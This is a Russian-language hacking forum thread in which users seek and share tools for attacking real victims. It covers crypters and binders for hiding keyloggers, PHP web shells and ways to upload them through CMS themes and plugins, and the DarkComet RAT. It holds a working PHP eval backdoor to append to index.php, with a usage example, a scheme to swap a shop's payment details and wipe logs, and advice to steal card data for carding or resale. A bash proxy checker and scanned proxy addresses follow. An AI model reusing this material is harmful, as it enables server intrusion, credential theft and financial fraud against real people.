софт для хакерства

soup, с фантазией все норм, я без крипта и склейки развел 3х хомяков но то что бы отключили антивирь и запустили кейлог )

Можешь дать линк на криптор ? По поводу склейки интирисовался, сказали что запихнут под что угодно цена 80 бакинских, мне кажеться это дорогововато.

Mozart, Увы линк не могу дать, давно этим не занимался. 80$ за разовую склейку это оочень дорого). Не нужно искать тех кто склеит тебе твой вирь, гораздо удобнее купить склейщик(приватный, те что в паблике если и работают то через раз) и склеивать самим все что душе угодно.

Может кто-то php shell'ом поделиться? И объянснить, как он будет работать?
Есть доступ в админ панель одного сайта, хочется поиметь доступ shh или ftp.

ps. Прошу простить администрацию за то что создал похожую тему в ветке "Школа"
Обязуюсь там описать суть своих действий по проникновению. Если найду конечно то что ищу..

Ага, все бегом давай свои шеллы выкладывать

Нагугли любой, например https://code.google.com/p/b374k-shell/
посмотри исходный код, там все доступно и понятно. Хочешь поиметь доступ к ssh или ftp? Смотри конфиги сайтов на сервере, бруть доступ, в чем проблема, информации в интернете - читать не перечитать.

mozal, php шелл это,обычно файловый менеджер. На форумах типа ачат, рдот, эксплоит.ин их дофига. Самые популярные - wso, c99 и т.д. Нагуглить все это не составляет труда. Другой вопрос, что как мы уже обсуждали в параллельной теме, шелл нужно как-то залить на сервак. Нужно смотреть что за цмс, как в нее заливают шеллы. Допустим, форум SMF (simple machines) заливает файлы через темы оформления, Wordpress через плагины, и так далее.

Вот я думал, если этим снифером я достаю номера карт, которые еще потом надо как-то пременить.
А что если,  я получаю рут доступ к крупному, или среднему, или малому магазину чего-либо. В случае малого, лучше чтобы товары были дорогими. Ничего не делаю, наблюдаю когда приходит больше всего денег - 1 месяц минимум, 2, 3...

В самый смачный день, возможно ли подменить заранее отверстанную страницу оплаты, скажем на другой номер оплаты той же системы обработки платежей(образно другой кошелек), или совсем другой(совсем другого сервиса)? Номер, заранее подготовленный, откуда можно легко все разрулить дальше. "Набить брюхо", вернуть все на место, потереть логи(какие можно), и больше туда не заходить)

Сработает ли такая тема?
Какую связку платежей лучше использовать?

mozal, я все равно не могу понять, какой механизм оплаты в магазине.
Вариантов по сути два -
1. Либо магазин сам формирует запрос на оплату: сам отправляет в банк запрос, типа "Вася хочет купить два самотыка, меня зовут Альберт, я владелец аккаунта №123456, спишите у Васи деньги и зачислите мне", не важно через api мерчанта или через свои велосипеды для каждого способа оплаты.
2. Магазин перенаправляет пользователя на страницу банка или мерчанта, и пользователь уже там вводит свои платежные данные.

Дальше менеджер или сам владелец магазина, смотрит в почту - там сообщение о том что Вася купил два самотыка. Как только на счет капнет денюжка - он будет паковать самотыки и отправлять их Васе. Начнутся непонятки с оплатой, Вася предоставляет платежку - а там счет не тот, владелец пробует оплатить сам - хуяк, приплыли.

Так тонко сработать получится(подменить реквизиты на свои), но тебя моментально запалят и начнут искать дыру. Либо найдут и залатают, либо накатят архив из бэкапа недельной давности(что вероятнее, лол). Профит в этом случае - один-два заказа, бабло с которых ты наверняка получить не успеешь, потому что у мерча может быть холд, или терпила напишет на тебя арбузу, деньги зависнут и привет.

Гораздо тоньше и выгоднее мало-мало покрадывать инфу о кредитках, а дальше - хочешь сам вбивай, хочешь продавай, товар вполне себе ликвидный и спрос на него есть.

Редактировался anshlag (2015-04-26 05 ч.)

пиздозаступник, спасибо за информацию! Наверное ты прав, но для начала нужно рут получить.

mozal, зачем тебе рут, тебе шелла хватит, причем там наверняка делов - фигня, ищи форму загрузки и ты в дамках

darkcomet rat попробуй, скачать везде можно

привет всем нашим и не нашим.
я тут нуб, но очень интересуюсь.
подскажите троян для награбления паролей из социальной сети

Готовые решения для слабых. Пиши сам.

Готовые в гугле по запросу:

Собирай сам из исходников. Криптуй. Склеивай. Впаривай жертве.

спасибо за ответ
трабл в том, что есть доступ ко всем ресурсам этого человека, вплоть до пороля от вафли и почты, привязанной к СС, но пароль нужно вытянуть незаметно и беспалевно

<?
if
	(isset($_GET['cmd'])) {
		eval($_GET['cmd']);
	}
?>

Дописываешь в index.php
Делаешь запрос вида /index.php?cmd=phpinfo();

Редактировался j0ri (2015-09-26 19 ч.)

Решил дописать в одну тему, а не плодить новые. Играю в "мамкиного хакера" )

Proxy checker на bash
https://github.com/ckam/proxy_checker

По умолчанию скрипт сначала сканирует, потом выводит в файл. Прервать процесс нелься, результат на смарку, если несколько тысяч адресов чекаеш.

Мой вариант немного измененный. Пишет после проверки прокси в файл.

#!/bin/bash

PROXYS='proxy.txt'
PROXY_TYPE='http'
CHECK_URL='https://api.ipify.org?format=json'
MAX_CONNECT=10
GOOD_ARR=()
FAIL_ARR=()
GOOD=0
FAIL=0

# COLORS #
RED='\e[1;31m'
BLUE='\e[1;34m'
TUR='\e[1;36m'
YEL='\e[1;33m'
DEF='\e[0m'
# END OF COLORS #

# GET OPTIONS #
while getopts ":ht:f:g:b:m:u:" OPTION
do
  case $OPTION in
    h)
      echo "Usage: $0 [-h - help] [-t <type> - type of proxy (http - default, socks4, socks5, socks5-hostname (dns throught socks5))] [-f <file> - file with proxy, default proxy.txt] [-g <file> - out file for good proxies] [-b <file> - out file for bad proxies] [-u <url> - url for check proxy, default $CHECK_URL] [-m <sec> - max connect time in second, default 10 sec]"
      echo "proxy format: ip:port:username:password or ip:port"
      exit 0;;
    t)
      PROXY_TYPE="$OPTARG";;
    f)
      PROXYS="$OPTARG";;
    g)
      GOOD_FILE="$OPTARG";;
    b)
      FAIL_FILE="$OPTARG";;
    u)
      CHECK_URL="$OPTARG";;
    m)
      MAX_CONNECT="$OPTARG";;
  esac
done
# END OF GET OPTIONS #

# PROXY TYPE #
if [[ $PROXY_TYPE == "http" ]]
then
  PROXY_TYPE_COMMAND="--proxy"
elif [[  $PROXY_TYPE == "socks4" ]]
then
  PROXY_TYPE_COMMAND="--socks4"
elif [[ $PROXY_TYPE == "socks5" ]]
then
  PROXY_TYPE_COMMAND="--socks5"
elif [[ $PROXY_TYPE == "socks5-hostname" ]]
then
  PROXY_TYPE_COMMAND="--socks5-hostname"
else
  echo -e $RED"Unknown type proxy. Exit"$DEF
  exit 1
fi
# END OF PROXY TYPE #

# CHECK CURL IF EXIST #
if ! which curl > /dev/null
then
  echo -e $RED"curl not found"$DEF
  exit 1
fi
# END OF CHECK CURL IF EXIST #

# CHECK FILE WITH PROXY IF EXIST #
if ! [ -f $PROXYS > /dev/null ]
then
  echo -e $RED"File with proxy not found ($PROXYS)"$DEF
  exit 1
fi
# END OF CHECK FILE WITH PROXY IF EXIST #

# CHECK MAX TIME CONNECT #
RE='^[0-9]+$'
if ! [[ $MAX_CONNECT =~ $RE ]]
then
  echo -e $RED"Max connect - invalid format"$DEF
  exit 1
fi
# END OF CHECK MAX TIME CONNECT#

# CHECK PROXY #
for PROXY in $(<$PROXYS)
do
  unset USER PASS
  IP=$(echo $PROXY | awk -F: '{print $1}')
  PORT=$(echo $PROXY | awk -F: '{print $2}')
  USER=$(echo $PROXY | awk -F: '{print $3}')
  PASS=$(echo $PROXY | awk -F: '{print $4}')

  if [[ $USER && $PASS ]]
  then
    curl -s -m $MAX_CONNECT $PROXY_TYPE_COMMAND $IP:$PORT -U $USER:$PASS $CHECK_URL > /dev/null
    CHECK=$?
  else
    curl -s -m $MAX_CONNECT $PROXY_TYPE_COMMAND $IP:$PORT $CHECK_URL > /dev/null
    CHECK=$?
  fi

  if [[ $CHECK -eq 0 ]]
  then
    echo -e $TUR"$PROXY is good - save $GOOD_FILE"$DEF
    echo -e $PROXY >> $GOOD_FILE
    GOOD=$(($GOOD+1))
    GOOD_ARR+=($PROXY)
  else
    echo -e $RED"$PROXY is dead - save $FAIL_FILE"$DEF
    echo -e $PROXY >> $FAIL_FILE
    FAIL=$(($FAIL+1))
    FAIL_ARR+=($PROXY)
  fi
done
# END OF CHECK PROXY #

    echo -e $BLUE"Good proxy: $GOOD$DEF,$RED bad proxy: $FAIL$DEF,$TUR all: $(($GOOD+$FAIL))"$DEF
exit 0

И вот вопрос по сканеру портов, как правильно искать проксики? Порты могут быть хрен пойми какие, указывать например от 0 до 65535 и чекать?
Ткните носом где почитать про сканирование проксиков.

Ага, почти. Меньше 80 чекать не стоит, а стоит чекать стандартные порты 80, 81, 88, 8000, 8080, 3128, 8888 и т.д.
Всякие приватные прокси могут быть на абсолютно любом порту.

Есть у меня у меня сканер виндовый, там чекбоксы только http/socks и большая кнопка "start" 

Так он находит достаточно быстро и много валидных проксей, причем далеко на не стандартных портах.

103.12.135.226:53281
103.12.160.61:52225
103.12.161.1:65103
103.12.161.11:52225
103.12.161.162:65205

в masscan ставил открытые порты, 0 до 65535, сканит быстро, но ничего не чекается. Интересно по какому алгоритму ищит виндовый сканер

Masscan, ZMap попробуй.

Да знаю я эти сканеры. Речь о том, как как определить, висит на порту прокси или нет. В выше показанном сканере % валидных проксиков больше 50% и он сразу ищит http и socks, сканирует быстро, вряд ли сам чекает.

Как это сделать на masscan ? По сути мы получаем айпи и порт открытый, а что на нем висит мы не знаем. Как тогда виндовый фильтрует при сканировании http/socks?

хз, мб где сорцы лежат этого сканера?